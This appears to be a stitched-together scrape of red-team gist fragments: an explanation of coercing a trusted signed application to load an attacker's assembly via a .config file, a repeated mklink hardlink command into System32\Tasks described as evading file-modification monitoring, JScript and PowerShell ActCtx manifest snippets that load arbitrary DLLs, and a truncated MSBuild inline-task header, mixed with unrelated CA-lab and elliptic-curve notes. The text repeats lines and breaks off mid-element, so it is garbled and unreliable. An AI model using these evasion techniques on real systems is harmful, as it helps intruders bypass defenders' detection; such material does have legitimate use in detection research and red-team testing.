Casey secdev02

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

	//Example Reference:
	// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
	// Test


	new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
	// Change that C:\\Tools to a location you specify, or dynamically find current directory.
	// ActCTX will search for the DLL in TMP

	var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';

	#Doesn't Even Have to Be A Conformant COM DLL To trigger the load.

	# Sample DLL To inject here
	# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179

	$manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>';
	$ax = new-object -Com "Microsoft.Windows.ActCtx"
	$ax.ManifestText = $manifest;
	$DWX = $ax.CreateObject("JustMakeSomethingUp");

	<#
	.SYNOPSIS
	Script to install and configure a standalone RootCA for Lab-Environments
	.DESCRIPTION
	This Script sets up a standalone RootCA. It's main purpose is to save time when building Labs in the classes I teach.
	###It's not meant for production!###
	First, it creates a CAPolicy.inf file. Then it deletes all default CDP and AIA and configures new ones.
	It turns on auditing and copys (It's a Lab!!!, so obviously no real offline RootCA...) the crt and crl to an edge webserver.
	.NOTES
	Author: Oliver Jäkel \| [email protected] \| @JaekelEDV

	# The mystery around secpxxxk1 generation points :)
	# -------------------------------------------------
	#
	# The SEC 2 familiy of elliptic curves are defined in https://www.secg.org/sec2-v2.pdf
	# and widely used in cryptography.
	#
	# The generation points G of these curves are defined in the standard paper without any nearer
	# explanation how they were chosen. Interestingly the generation points (G) of all prime order
	# koblitz curves of the SEC 2 family (secp160k1, secp192k1, secp224k1, secp256k1) share some
	# unusual mysterious property.

	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Text;

	public class TestClass
	{

	public TestClass()
	{}

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
	<!-- Author: Casey Smith, Twitter: @subTee -->
	<!-- License: BSD 3-Clause -->
	<Target Name="Hello">
	<FragmentExample />
	<ClassExample />
	</Target>
	<UsingTask